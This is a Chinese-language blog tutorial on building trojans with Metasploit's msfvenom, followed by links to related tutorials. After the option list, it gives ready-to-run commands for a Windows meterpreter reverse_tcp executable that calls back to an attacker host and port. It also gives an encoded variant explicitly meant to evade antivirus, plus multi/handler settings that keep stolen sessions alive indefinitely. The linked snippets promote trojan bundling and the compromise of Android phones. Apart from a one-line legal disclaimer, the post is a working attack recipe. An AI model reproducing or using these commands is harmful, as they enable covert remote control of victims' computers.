Metasploit -- 生成木马(msfvenom)
男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。
---- 网易云热评
作用:生成木马文件
1、msfvenom
相关参数介绍
-p, --payload <payload> 指定需要使用的payload(攻击荷载)
-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --list formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
2、以windows为例
基础命令格式
windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=8787 -f exe > shell.exe
加上编码(达到免杀效果)
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 LHOST=192.168.139.131 LPORT=4444 -f exe > 1.exe
3、连接生成的木马
选择攻击模块(exploit/multi/handler)
设置payload和上面的一样
4、目标主机运行木马
注意:
msf exploit(multi/handler) > set ExitOnSession false
//可以在接收到seesion后继续监听端口,保持侦听。
防止session意外退出
msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0
//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
msf5 exploit(multi/handler) > set SessionExpirationTimeout 0
//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
Metasploit -- 生成木马(msfvenom)相关推荐
- Metasploit 之生成木马(msfvenom)
msfvenom参数 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块 ...
- Metasploit 实现木马生成、捆绑及免杀
简介: 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接.木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木 ...
- msfvenom使用和生成木马
msfvenom生成木马 一.msfvenom命令 二.msfvenom生成木马 1.生成木马 2.下载打开并运行 3.加载攻击模块,设置payload 一.msfvenom命令 -l, --list ...
- 2021-12-09 使用kali生成木马,渗透Windows系统
本文章仅供学习和参考! 欢迎交流~ 目录 一.实验题目:使用kali生成木马,渗透Windows系统 二.实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三.实验环境 ...
- 使用Kali linux生成木马入侵局域网安卓手机
1.首先查看本机ip,这里我本机IP地址为192.168.0.105 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip ...
- msfvenom生成木马的简单利用
msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...
- 使用msfvenom生成木马用于监听别人的操作
ss msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& ...
- msfvenom生成木马攻击-Windows10实现自己黑自己
简介: 昨天看赛题的时候,发现了一个生成"木马",学一下,来做个笔记. 没有想到msf竟然有一个,可以生成木马的工具,msfvenom. 本文用 # 作为注释. 测试环境: 攻击机 ...
- msfvenom生成木马利用
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题. 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来 ...
最新文章
- 如何删除内联块元素之间的空间?
- raid1 raid2 raid5 raid6 raid10的优缺点和做各自raid需要几块硬盘
- Oracle 查看表空间、数据文件的大小及使用情况
- 能在任意一种框架中复用的组件,太牛了!
- 后端接口重定向_接口自动化面试题,建议收藏!
- Android系统的手表adb抓取log日志
- mysql 存储过程复杂查询_SQL分页存储过程 支持连接查询等复杂的SQL
- java in think 多态问题
- 原生js三种选项卡效果(滑动)
- ace admin ajax加载页面,循环加载首页的解决办法
- python爬去学校_利用Python如何爬取自己学校的官网?用这招就行!
- 8uftp怎么连到,8uftp怎么连到服务器
- 【亲测可行】SVN的添加忽略
- win7刷新环境变量的方法
- 个人计算机与工作站 服务器有什么区别,工作站与服务器有什么区别?
- Python两个列表交错合并方法
- 微软认知服务的使用 – 漫画翻译
- 迅雷2010校园招聘吉林大学第二次笔试题
- 别被漫画骗了..棋魂真正的结局是....
- R语言灰色关联分析法